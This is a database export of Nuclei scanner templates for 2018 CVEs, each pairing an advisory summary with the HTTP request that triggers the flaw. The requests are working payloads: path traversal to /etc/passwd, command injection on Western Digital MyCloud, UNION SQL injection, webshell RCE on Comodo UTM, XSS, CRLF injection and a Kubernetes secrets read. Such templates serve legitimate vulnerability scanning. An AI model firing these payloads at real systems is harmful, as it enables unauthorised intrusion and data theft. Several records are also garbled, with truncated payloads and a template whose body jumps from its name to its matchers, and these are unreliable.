23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308063" }, "name": "CVE-2018-16836.yaml", "content": "id: CVE-2018-16836\n\ninfo:\n name: Rubedo CMS <=3.4.0 - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files 
outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch.\n reference:\n - https://www.exploit-db.com/exploits/45385\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16836\n - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms\n - https://www.exploit-db.com/exploits/45385/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16836\n cwe-id: CWE-22\n epss-score: 0.26631\n epss-percentile: 0.96643\n cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rubedo_project\n product: rubedo\n tags: cve2018,cve,rubedo,lfi,edb,rubedo_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950", "hash": "164a096e749915c06719b6b181c8bcec", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308064" }, "name": "CVE-2018-16979.yaml", "content": "id: CVE-2018-16979\n\ninfo:\n name: Monstra CMS 3.0.4 - HTTP Header Injection\n author: 0x_Akoko\n severity: medium\n description: |\n Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. 
An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.\n impact: |\n This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE).\n remediation: |\n Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability.\n reference:\n - https://github.com/howchen/howchen/issues/4\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16979\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-16979\n cwe-id: CWE-113\n epss-score: 0.00141\n epss-percentile: 0.48943\n cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: monstra\n product: monstra\n tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'new line detected in'\n - 'cryptographp.php'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950", "hash": "7a060181eb7a11242fb4a1c2b1cb69f6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308065" }, "name": "CVE-2018-17153.yaml", "content": "id: CVE-2018-17153\n\ninfo:\n name: Western Digital MyCloud NAS - Authentication Bypass\n author: DhiyaneshDk\n severity: critical\n description: |\n It was discovered that the Western Digital My Cloud device before 2.30.196 
is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \\\"cgi_get_ipv6\\\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \\\"flag\\\" with the value \\\"1\\\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS.\n remediation: |\n Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability.\n reference:\n - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\n - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10108\n - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n classification:\n cvss-metrics: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17153\n cwe-id: CWE-287\n epss-score: 0.81607\n epss-percentile: 0.98273\n cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: western_digital\n product: my_cloud_wdbctl0020hwt_firmware\n shodan-query: http.favicon.hash:-1074357885\n tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital\n\nhttp:\n - raw:\n - |\n POST /web/google_analytics.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Cookie: isAdmin=1; username=admin;\n\n cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n\n matchers:\n - type: dsl\n dsl:\n - regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)\n - contains(body, \"ganalytics\")\n - status_code == 200\n condition: and\n# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950", "hash": "d1a11531c1b62ec49a7ebd046caf3622", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308066" }, "name": "CVE-2018-17246.yaml", "content": "id: CVE-2018-17246\n\ninfo:\n name: Kibana - Local File Inclusion\n author: princechaddha,thelicato\n severity: critical\n description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. 
An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.\n remediation: |\n Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md\n - https://www.elastic.co/community/security\n - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594\n - https://nvd.nist.gov/vuln/detail/CVE-2018-17246\n - https://access.redhat.com/errata/RHBA-2018:3743\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17246\n cwe-id: CWE-829,CWE-73\n epss-score: 0.96638\n epss-percentile: 0.99612\n cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elastic\n product: \"kibana\"\n tags: cve,cve2018,lfi,kibana,vulhub,elastic\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\"message\\\":\\\"An internal server error occurred\\\"\"\n\n - type: word\n part: header\n words:\n - \"kbn-name\"\n - \"kibana\"\n case-insensitive: true\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950", "hash": "9e9e08a95454db09bc96354de42eeeaa", "level": 6, "time": "2024-05-17 23:39:44" 
}, { "_id": { "$oid": "66477a413521042ccf308067" }, "name": "CVE-2018-17254.yaml", "content": "id: CVE-2018-17254\n\ninfo:\n name: Joomla! JCK Editor SQL Injection\n author: Suman_Kar\n severity: critical\n description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: Update or remove the affected plugin.\n reference:\n - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html\n - https://www.exploit-db.com/exploits/45423/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17254\n cwe-id: CWE-89\n epss-score: 0.81793\n epss-percentile: 0.98093\n cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: arkextensions\n product: jck_editor\n framework: joomla\\!\n tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\\!\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950", "hash": "41fe0f8a3946961ce88e16d5dec9ef32", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308068" }, "name": "CVE-2018-17422.yaml", "content": "id: CVE-2018-17422\n\ninfo:\n name: DotCMS < 
5.0.2 - Open Redirect\n author: 0x_Akoko,daffainfo\n severity: medium\n description: |\n dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability.\n reference:\n - https://github.com/dotCMS/core/issues/15286\n - https://nvd.nist.gov/vuln/detail/CVE-2018-17422\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-17422\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.44971\n cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: dotcms\n product: dotcms\n shodan-query: http.title:\"dotCMS\"\n tags: cve2018,cve,redirect,dotcms\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'\n - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"self.location = 'http://evil.com'\"\n - \"location.href = 'http\\\\x3a\\\\x2f\\\\x2fwww\\\\x2eevil\\\\x2ecom'\"\n# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950", "hash": "b4e423c53a03840b8fa257073c9f2c44", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308069" }, 
"name": "CVE-2018-17431.yaml", "content": "id: CVE-2018-17431\n\ninfo:\n name: Comodo Unified Threat Management Web Console - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches or updates provided by Comodo to fix this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48825\n - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276\n - https://nvd.nist.gov/vuln/detail/CVE-2018-17431\n - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437\n - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17431\n cwe-id: CWE-287\n epss-score: 0.11416\n epss-percentile: 0.95098\n cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: comodo\n product: unified_threat_management_firewall\n tags: cve,cve2018,comodo,rce,edb\n\nhttp:\n - raw:\n - |\n GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n - | # to triggering RCE\n GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Configuration has been altered\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100ca7ed1082cfdba5563bdbd1b3dc533dd565615fe6a085a30befb5e2f75e5442d022100bd883a1061bf5478d99af8d1b40df6015f8b5b38d7fa411037031d3c1bef9bc3:922c64590222798bb761d5b6d8e72950", "hash": "a5d93d71c3335c367d0e218dd1eaef4d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806a" }, "name": "CVE-2018-18069.yaml", "content": "id: CVE-2018-18069\n\ninfo:\n name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting\n author: nadino\n severity: medium\n description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability.\n reference:\n - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18069\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-18069\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.38026\n cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpml\n product: wpml\n framework: wordpress\n tags: cve2018,cve,wordpress,xss,plugin,wpml\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin.php\"\n\n body: |\n icl_post_action=save_theme_localization&locale_file_name_en=EN\">\n host-redirects: true\n max-redirects: 2\n matchers:\n - 
type: dsl\n dsl:\n - 'contains(tolower(header), \"text/html\")'\n - 'contains(set_cookie, \"_icl_current_admin_language\")'\n - 'contains(body, \"\\\">\")'\n condition: and\n# digest: 4b0a00483046022100cbde343fd3e17d2ea27e336ffb9188c1b206ffddbca64133f60a51899fec8161022100f831ce4023cacc6cdc0e47b7d783b39f80685ce3a9dd5b1f475af144b8163794:922c64590222798bb761d5b6d8e72950", "hash": "d28e802286666f380cf00277dfeb3220", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806b" }, "name": "CVE-2018-18264.yaml", "content": "id: CVE-2018-18264\n\ninfo:\n name: Kubernetes Dashboard <1.10.1 - Authentication Bypass\n author: edoardottt\n severity: high\n description: |\n Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster.\n remediation: |\n Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability.\n reference:\n - https://github.com/kubernetes/dashboard/pull/3289\n - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/\n - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18264\n - https://github.com/kubernetes/dashboard/pull/3400\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-18264\n cwe-id: CWE-306\n epss-score: 0.96092\n epss-percentile: 0.99459\n cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: kubernetes\n product: dashboard\n shodan-query: product:\"Kubernetes\"\n tags: cve,cve2018,kubernetes,k8s,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs\"\n 
- \"{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body, \"apiVersion\") && contains(body, \"objectRef\")'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950", "hash": "5ec58b4e2d331cd7d377b1b47062310e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806c" }, "name": "CVE-2018-18323.yaml", "content": "id: CVE-2018-18323\n\ninfo:\n name: Centos Web Panel 0.9.8.480 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server.\n remediation: |\n Upgrade to a patched version of Centos Web Panel.\n reference:\n - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html\n - http://centos-webpanel.com/\n - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18323\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-18323\n cwe-id: CWE-22\n epss-score: 0.9648\n epss-percentile: 0.99556\n cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: control-webpanel\n product: webpanel\n tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950", "hash": "6cf48406e3dfbb2f5a61d04c5b5f8204", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806d" }, "name": "CVE-2018-18570.yaml", "content": "id: CVE-2018-18570\n\ninfo:\n name: Planon \"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950", "hash": "037e44071fd64bf8ab8af592afa276be", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30806e" }, "name": "CVE-2018-18608.yaml", "content": "id: CVE-2018-18608\n\ninfo:\n name: DedeCMS 5.7 SP2 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - 
https://github.com/ky-j/dedecms/issues/8\n - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx\n - https://nvd.nist.gov/vuln/detail/CVE-2018-18608\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-18608\n cwe-id: CWE-79\n epss-score: 0.00177\n epss-percentile: 0.54991\n cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dedecms\n product: dedecms\n shodan-query: http.html:\"DedeCms\"\n tags: cve2018,cve,dedecms,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plus/feedback.php/rp4hu%27>\")'\n# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950", "hash": "7ddcc242f21feab814086b834cf76e0f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308074" }, "name": "CVE-2018-19136.yaml", "content": "id: CVE-2018-19136\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45883/\n - https://github.com/domainmod/domainmod/issues/79\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19136\n - https://github.com/ARPSyndicate/cvemon\n - 
https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19136\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50531\n cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: domainmod\n product: domainmod\n tags: cve2018,cve,edb,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">&really_del=1\">YES'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202aa2d37d93090e65caa5149dce628a5f34aaf844a03795a60118487af86ad41a022100948b4dfb7fbc394901fe1405320714bc046f960c82c84e7dd65bfd91b4001a31:922c64590222798bb761d5b6d8e72950", "hash": "67c51c8950a4baf57fbbbadcefb3c44b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308075" }, "name": "CVE-2018-19137.yaml", "content": "id: CVE-2018-19137\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - 
https://github.com/domainmod/domainmod/issues/79\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19137\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19137\n cwe-id: CWE-79\n epss-score: 0.00096\n epss-percentile: 0.39294\n cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: domainmod\n product: domainmod\n tags: cve,cve2018,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '&really_del'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950", "hash": "70b0f545940507a4291c82e869aca9f8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308076" }, "name": "CVE-2018-19287.yaml", "content": "id: CVE-2018-19287\n\ninfo:\n name: WordPress Ninja Forms <3.3.18 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. 
